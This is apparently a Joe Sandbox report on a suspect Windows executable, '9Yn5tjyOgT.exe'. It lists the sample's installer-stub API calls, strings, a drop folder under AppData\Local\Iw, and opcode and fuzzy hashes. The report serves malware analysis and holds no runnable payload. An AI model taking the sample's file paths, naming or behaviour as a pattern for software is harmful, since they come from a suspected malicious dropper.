                                                                                                                      • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                                      • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                      • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                      • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                      • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                      • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                      • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                      • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                    • String ID: (7B$A$C:\Users\user\AppData\Local\Iw$Call
                                                                                                                    • API String ID: 2624150263-819140515
                                                                                                                    • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                    • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                                    • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                                    • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                                    APIs
                                                                                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Iw\Vehefte190, xrefs: 004021C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstance
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Iw\Vehefte190
                                                                                                                    • API String ID: 542301482-1534214271
                                                                                                                    • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                                    • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                                    • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                                    • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1974802433-0
                                                                                                                    • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                    • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                                    • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                                    • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                                    APIs
                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                    • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                    • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                    • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                    • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                    • String ID: Call$N
                                                                                                                    • API String ID: 3103080414-3438112850
                                                                                                                    • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                    • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                                    • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                                    • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                                    APIs
                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                    • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                    • String ID: F
                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                    • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                    • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                                    • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                                    • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                                    APIs
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                                    • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                                      • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                      • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                    • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                    • wsprintfA.USER32 ref: 004060B3
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                    • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                      • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\9Yn5tjyOgT.exe,80000000,00000003), ref: 00405EE2
                                                                                                                      • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                                                    • API String ID: 2171350718-461813615
                                                                                                                    • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                    • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                    • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                    • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                    APIs
                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                    • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                    • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\9Yn5tjyOgT.exe",00403480,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                    • String ID: "C:\Users\user\Desktop\9Yn5tjyOgT.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 589700163-155059118
                                                                                                                    • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                    • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                    • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                    • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                    APIs
                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                    • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                    • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                    • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2320649405-0
                                                                                                                    • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                    • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                    • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                    • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                    • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                    • lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                    • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2531174081-0
                                                                                                                    • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                    • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                    • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                    • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                    • wsprintfW.USER32 ref: 00402EF5
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                      • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                      • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                      • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                      • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                      • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,00001D31), ref: 00402E87
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                    • String ID: ... %d%%
                                                                                                                    • API String ID: 722711167-2449383134
                                                                                                                    • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                    • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                    • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                    • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                    • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
